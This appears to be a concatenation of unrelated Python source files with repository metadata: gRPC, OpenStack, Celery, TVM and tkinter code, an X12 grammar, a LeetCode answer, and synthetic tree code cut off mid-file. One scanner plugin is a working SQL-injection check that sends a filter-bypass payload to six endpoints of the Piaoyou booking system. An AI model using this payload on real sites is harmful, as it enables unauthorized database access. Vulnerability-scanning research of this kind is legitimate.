from grpc._cython import cygrpc
_LOGGER = logging.getLogger(__name__)
class _AuthMetadataContext(
collections.namedtuple('AuthMetadataContext', (
'service_url',
'method_name',
)), grpc.AuthMetadataContext):
pass
class _CallbackState(object):
def __init__(self):
self.lock = threading.Lock()
self.called = False
self.exception = None
class _AuthMetadataPluginCallback(grpc.AuthMetadataPluginCallback):
def __init__(self, state, callback):
self._state = state
self._callback = callback
def __call__(self, metadata, error):
with self._state.lock:
if self._state.exception is None:
if self._state.called:
raise RuntimeError(
'AuthMetadataPluginCallback invoked more than once!')
else:
self._state.called = True
else:
raise RuntimeError(
'AuthMetadataPluginCallback raised exception "{}"!'.format(
self._state.exception))
if error is None:
self._callback(metadata, cygrpc.StatusCode.ok, None)
else:
self._callback(None, cygrpc.StatusCode.internal,
_common.encode(str(error)))
class _Plugin(object):
def __init__(self, metadata_plugin):
self._metadata_plugin = metadata_plugin
def __call__(self, service_url, method_name, callback):
context = _AuthMetadataContext(
_common.decode(service_url), _common.decode(method_name))
callback_state = _CallbackState()
try:
self._metadata_plugin(context,
_AuthMetadataPluginCallback(
callback_state, callback))
except Exception as exception: # pylint: disable=broad-except
_LOGGER.exception(
'AuthMetadataPluginCallback "%s" raised exception!',
self._metadata_plugin)
with callback_state.lock:
callback_state.exception = exception
if callback_state.called:
return
callback(None, cygrpc.StatusCode.internal,
_common.encode(str(exception)))
def metadata_plugin_call_credentials(metadata_plugin, name):
if name is None:
try:
effective_name = metadata_plugin.__name__
except AttributeError:
effective_name = metadata_plugin.__class__.__name__
else:
effective_name = name
return grpc.CallCredentials(
cygrpc.MetadataPluginCallCredentials(
_Plugin(metadata_plugin), _common.encode(effective_name)))
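# Illustrative usage sketch (added comment, not part of the original module):
# applications normally reach this wrapper through the public helper
# grpc.metadata_call_credentials(plugin), e.g.:
#
#   def _auth_plugin(context, callback):
#       # context.service_url / context.method_name identify the RPC
#       callback((('authorization', 'Bearer <token>'),), None)
#
#   call_creds = grpc.metadata_call_credentials(_auth_plugin)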
| [
"[email protected]"
] | |
7a4ccc2502dab8ff8f1958d5055642f4c92c18ce | bd9a09a3f1a8b2b5166c540ada93cc5b30591605 | /scanner/plugins/cms/piaoyou/piaoyou_six2_sqli.py | eec921a1b177ff73dbc2f527350a99da77615bf5 | [
"MIT"
] | permissive | iceyhexman/onlinetools | 3cb6e349fc30c515f96429abeab5fbcc430ac0cc | 61f2df7ff8e6ad97ca7901728c3ab749679a2bd0 | refs/heads/master | 2023-08-06T19:31:51.328657 | 2022-10-28T04:01:38 | 2022-10-28T04:01:38 | 119,565,769 | 1,662 | 358 | MIT | 2023-03-31T14:34:13 | 2018-01-30T16:51:46 | Python | UTF-8 | Python | false | false | 1,390 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: Piaoyou flight-booking system, SQL injection at 6 endpoints #2 (filter bypass)
referer: http://www.wooyun.org/bugs/wooyun-2015-0116851
author: Lucifer
description: multiple SQL injection points.
'''
import sys
import requests
class piaoyou_six2_sqli_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
urls = ["/Parmset/sms_mb_edit.aspx?id=1",
"/Sales/meb_edit.aspx?id=1",
"/Sales/meb_his.aspx?id=1",
"/Other/hotel_edit.aspx?id=1",
"/Visa/visa_edit.aspx?id=1",
"/Visa/gjqz_add.aspx?id=214"]
try:
for url in urls:
vulnurl = self.url + url + "AnD/**/1=Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27))--"
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
return "[+]存在票友机票预订系统SQL注入漏洞(绕过)...(高危)\tpayload: "+vulnurl
except:
return "[-]connect timeout"
if __name__ == "__main__":
testVuln = piaoyou_six2_sqli_BaseVerify(sys.argv[1])
testVuln.run()
| [
"[email protected]"
] | |
f0af40b807555df49c70d1410197dbfebf56faea | 46d2bb5c6d2ea91ac8a3fda0168cc99501b1abe4 | /middleware/client_test.py | 23a21e179175a2942d8e6f0cd79747b4b0f65bdf | [
"Apache-2.0"
] | permissive | Time1ess/VES | 2fe0a1c3371e243a377ad6a31df5d3b4651ddf4d | fe608b8ae469f81cc23b1ea30f02a1e68fac13ee | refs/heads/master | 2021-01-18T21:36:21.864535 | 2016-06-15T12:21:42 | 2016-06-15T12:21:42 | 52,199,990 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,793 | py | #!/usr/bin/python
# coding:utf-8
# Author: David
# Email: [email protected]
# Created: 2016-04-04 14:10
# Last modified: 2016-04-11 10:01
# Filename: client_test.py
# Description:
import socket
import time
import sys
import select
from random import randint
def Check_Identity(data):
if data == "VES":
return True
return False
if len(sys.argv) < 2:
name = raw_input("Enter type(v for video,d for display):")
else:
name = sys.argv[1]
broad_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #
broad_sock.bind(('', 8089))
data = None
addr = None
while True:
data, addr = broad_sock.recvfrom(4096)
if Check_Identity(data) is True:
break
broad_sock.close()
host = addr[0]
print 'Get broadcast message from host:', host
port = 8090 if name == "v" else 8092
ss = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send socket
ss.connect((host, port))
client = None
if name == "v":
sr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sr.bind(('', 8091))
sr.listen(1)
client, addr = sr.accept()
print 'Get connected from middleware'
disconnected = False
while True:
if name == "v" and not disconnected:
rs, ws, es = select.select([client], [], [], 0.1)
for r in rs:
try:
msg = r.recv(4096)
disconnected = not msg
except:
disconnected = True
if r is client:
if disconnected:
                    print 'Middleware system disconnected.'
break
else:
print '[Middleware msg] ', msg
try:
msg = repr(tuple([randint(0, 360) for x in xrange(3)]))
ss.send(msg)
except:
print 'Socket close.'
break
time.sleep(0.1)
| [
"[email protected]"
] | |
5e9365cd8fcdc3c33017a4fb7808aa0e14bf48f8 | 2e3e256bcc0086a61cbb0e082dc61290196e35d2 | /dragon/common/custom_backend_auth.py | c06f172b49bf3edcc9fa4ad9cf008c2682719502 | [
"Apache-2.0"
] | permissive | miradam/openstack-workload-disaster-recovery | 79dcdb15ebf95d89157751c750a5dbab1557b942 | 854a3952bb9278cc08017ada97ff150b12b1c687 | refs/heads/master | 2020-03-24T15:36:46.808591 | 2016-12-15T12:32:17 | 2016-12-15T12:32:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,087 | py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (C) 2012, Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Middleware for authenticating against custom backends.
"""
import logging
from dragon.openstack.common import local
from dragon.rpc import client as rpc_client
import webob.exc
LOG = logging.getLogger(__name__)
class AuthProtocol(object):
def __init__(self, app, conf):
self.conf = conf
self.app = app
def __call__(self, env, start_response):
"""
Handle incoming request.
Authenticate send downstream on success. Reject request if
we can't authenticate.
"""
LOG.debug('Authenticating user token')
context = local.store.context
engine = rpc_client.EngineClient()
authenticated = engine.authenticated_to_backend(context)
if authenticated:
return self.app(env, start_response)
else:
return self._reject_request(env, start_response)
def _reject_request(self, env, start_response):
"""
Redirect client to auth server.
:param env: wsgi request environment
:param start_response: wsgi response callback
:returns HTTPUnauthorized http response
"""
resp = webob.exc.HTTPUnauthorized("Backend authentication failed", [])
return resp(env, start_response)
def filter_factory(global_conf, **local_conf):
conf = global_conf.copy()
conf.update(local_conf)
def auth_filter(app):
return AuthProtocol(app, conf)
return auth_filter
| [
"[email protected]"
] | |
a216e6e27226559c893a544e64f063b65a73dc33 | e3bbbb5018baad3cd2a2daf10e315a2e12aec974 | /ichnaea/async/schedule.py | 129cd2fffdcfed4b50627ec2d05e94d081463a88 | [
"Apache-2.0"
] | permissive | ingle/ichnaea | 5980de0532b012af7e48fa89bad7516adb84d24e | ed467538b6e61cf7c7921cd4aacb32ee039d13aa | refs/heads/master | 2021-01-17T14:23:32.369530 | 2016-01-12T20:29:38 | 2016-01-12T20:29:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,476 | py | """
Contains the `Celery Beat schedule
<http://celery.rtfd.org/en/latest/userguide/periodic-tasks.html>`_.
"""
from datetime import timedelta
from celery.schedules import crontab
from ichnaea.models import (
CellShard,
DataMap,
WifiShard,
)
def celerybeat_schedule(app_config):
"""Return the celery beat schedule as a dictionary."""
sections = app_config.sections()
schedule = {
# Monitoring
'monitor-queue-size': {
'task': 'ichnaea.data.tasks.monitor_queue_size',
'schedule': timedelta(seconds=60),
'options': {'expires': 57},
},
'monitor-api-users': {
'task': 'ichnaea.data.tasks.monitor_api_users',
'schedule': timedelta(seconds=600),
'options': {'expires': 570},
},
'monitor-api-key-limits': {
'task': 'ichnaea.data.tasks.monitor_api_key_limits',
'schedule': timedelta(seconds=600),
'options': {'expires': 570},
},
# Statistics
'update-statcounter': {
'task': 'ichnaea.data.tasks.update_statcounter',
'args': (1, ),
'schedule': crontab(minute=3),
'options': {'expires': 2700},
},
'update-statregion': {
'task': 'ichnaea.data.tasks.update_statregion',
'schedule': crontab(minute=5),
'options': {'expires': 2700},
},
# Data Pipeline
'schedule-export-reports': {
'task': 'ichnaea.data.tasks.schedule_export_reports',
'schedule': timedelta(seconds=8),
'options': {'expires': 15},
},
'update-cellarea': {
'task': 'ichnaea.data.tasks.update_cellarea',
'schedule': timedelta(seconds=8),
'args': (100, ),
'options': {'expires': 15},
},
'update-cellarea-ocid': {
'task': 'ichnaea.data.tasks.update_cellarea_ocid',
'schedule': timedelta(seconds=9),
'args': (100, ),
'options': {'expires': 15},
},
'update-score': {
'task': 'ichnaea.data.tasks.update_score',
'args': (250, ),
'schedule': timedelta(seconds=9),
'options': {'expires': 10},
},
}
for shard_id in CellShard.shards().keys():
schedule.update({
'update-cell-' + shard_id: {
'task': 'ichnaea.data.tasks.update_cell',
'schedule': timedelta(seconds=7),
'args': (500, shard_id),
'options': {'expires': 10},
}
})
for shard_id in DataMap.shards().keys():
schedule.update({
'update-datamap-' + shard_id: {
'task': 'ichnaea.data.tasks.update_datamap',
'args': (500, shard_id),
'schedule': timedelta(seconds=14),
'options': {'expires': 20},
},
})
for shard_id in WifiShard.shards().keys():
schedule.update({
'update-wifi-' + shard_id: {
'task': 'ichnaea.data.tasks.update_wifi',
'schedule': timedelta(seconds=6),
'args': (500, shard_id),
'options': {'expires': 10},
}
})
if 'assets' in sections and app_config.get('assets', 'bucket', None):
# only configure tasks if target bucket is configured
schedule.update({
'cell-export-full': {
'task': 'ichnaea.data.tasks.cell_export_full',
'schedule': crontab(hour=0, minute=13),
'options': {'expires': 39600},
},
'cell-export-diff': {
'task': 'ichnaea.data.tasks.cell_export_diff',
'schedule': crontab(minute=3),
'options': {'expires': 2700},
},
})
if 'import:ocid' in sections:
schedule.update({
'monitor-ocid-import': {
'task': 'ichnaea.data.tasks.monitor_ocid_import',
'schedule': timedelta(seconds=600),
'options': {'expires': 570},
},
'cell-import-external': {
'task': 'ichnaea.data.tasks.cell_import_external',
'args': (True, ),
'schedule': crontab(minute=52),
'options': {'expires': 2700},
},
})
return schedule
| [
"[email protected]"
] | |
8dd2e0625d7cddc0360585244105d243400bfd8c | 62e58c051128baef9452e7e0eb0b5a83367add26 | /x12/6010/504006010.py | f720a213c867cbaeb745d5d7e34ed4a67527b198 | [] | no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 844 | py | from bots.botsconfig import *
from records006010 import recorddefs
syntax = {
'version': '00601',
'functionalgroup': 'CC',
}
structure = [
{ID: 'ST', MIN: 1, MAX: 1, LEVEL: [
{ID: 'BGN', MIN: 1, MAX: 1},
{ID: 'N1', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'N2', MIN: 0, MAX: 2},
{ID: 'N3', MIN: 0, MAX: 2},
{ID: 'N4', MIN: 0, MAX: 1},
{ID: 'PER', MIN: 0, MAX: 99999},
{ID: 'DTP', MIN: 0, MAX: 99999},
{ID: 'LM', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'LQ', MIN: 1, MAX: 99999},
]},
]},
{ID: 'REF', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'DTP', MIN: 0, MAX: 99999},
{ID: 'MSG', MIN: 0, MAX: 99999},
{ID: 'LM', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'LQ', MIN: 1, MAX: 99999},
]},
]},
{ID: 'SE', MIN: 1, MAX: 1},
]}
]
| [
"[email protected]"
] | |
9c0840e858c444ea844208b24a2948f9ad7256f6 | aad4481e8a54e311982d638c1b42a86180726970 | /examples/event-loop-stuff/timeout-clock.py | b5a2076df4b5ee032662cafab72effec9061d0ae | [
"Unlicense",
"Zlib"
] | permissive | jiangguoqing/tkinter-tutorial | 5639b11cfc2f339df3776410dbd7078ee07fac54 | c6fee61ee915cf0894125e5b5eeb7249237d3a6b | refs/heads/master | 2021-05-05T12:02:13.912298 | 2017-06-18T10:51:33 | 2017-06-18T10:51:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 443 | py | import tkinter as tk
import time
# this must return soon after starting this
def change_text():
label['text'] = time.asctime()
# now we need to run this again after one second, there's no better
# way to do this than timeout here
root.after(1000, change_text)
root = tk.Tk()
label = tk.Label(root, text='0')
label.pack()
change_text() # don't forget to actually start it :)
root.geometry('200x200')
root.mainloop()
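# Note (added comment, not in the original example): root.after() returns an
# id, so the loop could be stopped with root.after_cancel(id) if the clock
# ever needs to pause; tkinter has no better periodic-callback primitive.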
| [
"[email protected]"
] | |
cd515ac2fb82afb70c385e634c68f7f523290d90 | 1097ed333a4000634e68a590ee6ffc6129ae61e3 | /287.寻找重复数.py | f7574fcf8c3ef85cc24ac1beab25979bd36b19d0 | [
"MIT"
] | permissive | AutuanLiu/Code-Storm2019 | 1bbe890c7ca0d033c32348173bfebba612623a90 | 8efc7c5475fd888f7d86c3b08a3c1c9e55c1ac30 | refs/heads/master | 2020-04-23T07:03:08.975232 | 2019-10-24T08:56:26 | 2019-10-24T08:56:26 | 170,995,032 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,679 | py | #
# @lc app=leetcode.cn id=287 lang=python3
#
# [287] Find the Duplicate Number
#
# https://leetcode-cn.com/problems/find-the-duplicate-number/description/
#
# algorithms
# Medium (60.60%)
# Likes: 246
# Dislikes: 0
# Total Accepted: 17.2K
# Total Submissions: 28.4K
# Testcase Example: '[1,3,4,2,2]'
#
# Given an array nums containing n + 1 integers, each between 1 and n
# (inclusive), at least one integer must appear twice. Assuming there is
# only one duplicated integer, find that duplicate.
#
# Example 1:
#
# Input: [1,3,4,2,2]
# Output: 2
#
#
# Example 2:
#
# Input: [3,1,3,4,2]
# Output: 3
#
#
# Notes:
#
#
# You must not modify the array (assume the array is read only).
# You may only use constant, O(1) extra space.
# Your runtime complexity should be less than O(n^2).
# There is only one duplicate number, but it could be repeated more than once.
#
#
#
# First approach: sort the array, then scan it; if the value at the next
# position equals the current value, that value is the duplicate.
# class Solution:
# def findDuplicate(self, nums: List[int]) -> int:
#         nums = sorted(nums) # this allocates new space for a sorted copy
# n = len(nums)
# for i in range(n-1):
# if nums[i] == nums[i + 1]:
# return nums[i]
# return -1
class Solution(object):
def findDuplicate(self, nums):
slow = 0
fast = 0
while True:
slow = nums[slow]
fast = nums[nums[fast]]
if slow == fast:
break
finder = 0
while True:
slow = nums[slow]
finder = nums[finder]
if slow == finder:
return slow
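# Quick sanity check (added illustration, not part of the original file);
# this is Floyd's cycle detection, treating nums as a linked list i -> nums[i]:
#
#   Solution().findDuplicate([1, 3, 4, 2, 2])  # -> 2
#   Solution().findDuplicate([3, 1, 3, 4, 2])  # -> 3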
| [
"[email protected]"
] | |
56bb1b8a3d238c6c89226c5276b91e8649ac0852 | 660e3a2bb5f127908549d52ebc62d0d67725f832 | /Algorithm_python/최소반복.py | 289ccfc40280f63b62c7f53a788273646c84b529 | [] | no_license | dygksquf5/python_study | b56f8548bea7e31a484301bb97ddefe44d931c80 | 282126b0104dae9f9f8f63e613cc968a2f998ef1 | refs/heads/master | 2023-02-21T03:46:16.673962 | 2021-01-24T14:08:47 | 2021-01-24T14:08:47 | 294,593,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 742 | py | # 주어진 수가 커서, 나머지 테스트케이스는 전부 에러ㅓㅓㅓ
def solution(arr):
answer = 0
id = [0] * len(set(str(arr)))
visited = [False] * len(id)
for i in range(len(arr)):
if not visited[arr[i] - 1]:
id[arr[i] - 1] = i
visited[arr[i] - 1] = True
continue
if visited[arr[i] - 1]:
answer = min(i - id[arr[i] - 1], id[arr[i] - 1])
id[arr[i] - 1] = max(i - id[arr[i] - 1], id[arr[i] - 1])
if answer == 0:
return -1
else:
return answer
# answer = []
# id = collections.defaultdict(list)
# for i in sorted(set(arr)):
# id[i] = [dup for dup in range(len(arr)) if arr[dup] == i] | [
"[email protected]"
] | |
eb884160b46e9b642bf272c7dd14832b474646d7 | b5e4958bd1c4770297108947e7b7441020b2e9cc | /topi/tests/python_cpp/test_topi_relu.py | f214266351210bcd11b71be64cdebdfc98b25ba6 | [
"Apache-2.0"
] | permissive | Markz2z/tvm | 06a20dcdf76111b64242940323ba998432ffbffb | 3921b938c2a14017c2624f149983e86a7f9a4e94 | refs/heads/master | 2021-09-07T22:13:37.234511 | 2018-02-27T23:14:58 | 2018-02-27T23:14:58 | 124,998,633 | 1 | 0 | Apache-2.0 | 2018-03-13T05:45:19 | 2018-03-13T05:45:19 | null | UTF-8 | Python | false | false | 2,070 | py | """Test code for relu activation"""
import os
import numpy as np
import tvm
import topi
from topi.util import get_const_tuple
def verify_relu(m, n, dtype):
A = tvm.placeholder((m, n), name='A', dtype=dtype)
B = topi.cpp.nn.relu(A)
assert B.dtype == dtype
a_np = np.random.uniform(size=get_const_tuple(A.shape)).astype(A.dtype)
b_np = a_np * (a_np > 0)
def check_device(device):
if not tvm.module.enabled(device):
print("Skip because %s is not enabled" % device)
return
print("Running on target: %s" % device)
target = topi.cpp.TEST_create_target(device)
if device == "llvm":
s = topi.cpp.generic.schedule_injective(target, [B])
else:
s = topi.cpp.cuda.schedule_injective(target, [B])
ctx = tvm.context(device, 0)
a = tvm.nd.array(a_np, ctx)
b = tvm.nd.array(np.zeros(get_const_tuple(B.shape), dtype=B.dtype), ctx)
foo = tvm.build(s, [A, B], device, name="relu")
foo(a, b)
np.testing.assert_allclose(b.asnumpy(), b_np, rtol=1e-5)
for device in ['cuda', 'opencl', 'metal', 'rocm']:
check_device(device)
def verify_leaky_relu(m, alpha):
A = tvm.placeholder((m,), name='A')
B = topi.cpp.nn.leaky_relu(A, alpha)
device = "llvm"
target = topi.cpp.TEST_create_target(device)
s = topi.cpp.generic.schedule_injective(target, [B])
a_np = np.random.uniform(size=get_const_tuple(A.shape)).astype(A.dtype)
b_np = a_np * (a_np > 0) + a_np * (a_np < 0) * alpha
ctx = tvm.cpu(0)
a = tvm.nd.array(a_np, ctx)
b = tvm.nd.array(np.zeros(get_const_tuple(B.shape), dtype=B.dtype), ctx)
foo = tvm.build(s, [A, B], device, name="leaky_relu")
foo(a, b)
np.testing.assert_allclose(b.asnumpy(), b_np, rtol=1e-5)
def test_relu():
for dtype in ['float32', 'float64', 'int32', 'int16', 'int8', 'int64']:
verify_relu(10, 128, dtype)
def test_leaky_relu():
verify_leaky_relu(100, 0.1)
if __name__ == "__main__":
test_relu()
test_leaky_relu()
| [
"[email protected]"
] | |
9855a9a453ba14cf06e3fe967deea374c8fe1a86 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/tree-big-677.py | bb26289d2195905caac5c6473919fe4679455e63 | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,911 | py | # Binary-search trees
class TreeNode(object):
value:int = 0
left:"TreeNode" = None
right:"TreeNode" = None
def insert(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode(x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode(x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode2(object):
value:int = 0
value2:int = 0
left:"TreeNode2" = None
left2:"TreeNode2" = None
right:"TreeNode2" = None
right2:"TreeNode2" = None
def insert(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
    def contains(self:"TreeNode2", x:int) -> bool:
        if x < self.value:
            if self.left is None:
                return False
            else:
                return self.left.contains(x)
        elif x > self.value:
            if self.right is None:
                return False
            else:
                return self.right.contains(x)
        else:
            return True
def contains2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode3(object):
value:int = 0
value2:int = 0
value3:int = 0
left:"TreeNode3" = None
left2:"TreeNode3" = None
left3:"TreeNode3" = None
right:"TreeNode3" = None
right2:"TreeNode3" = None
right3:"TreeNode3" = None
def insert(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode4(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
left:"TreeNode4" = None
left2:"TreeNode4" = None
left3:"TreeNode4" = None
left4:"TreeNode4" = None
right:"TreeNode4" = None
right2:"TreeNode4" = None
right3:"TreeNode4" = None
right4:"TreeNode4" = None
def insert(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode5(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
value5:int = 0
left:"TreeNode5" = None
left2:"TreeNode5" = None
left3:"TreeNode5" = None
left4:"TreeNode5" = None
left5:"TreeNode5" = None
right:"TreeNode5" = None
right2:"TreeNode5" = None
right3:"TreeNode5" = None
right4:"TreeNode5" = None
right5:"TreeNode5" = None
def insert(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class Tree(object):
root:TreeNode = None
size:int = 0
def insert(self:"Tree", x:int) -> object:
if self.root is None:
self.root = makeNode(x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree2(object):
root:TreeNode2 = None
root2:TreeNode2 = None
size:int = 0
size2:int = 0
def insert(self:"Tree2", x:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
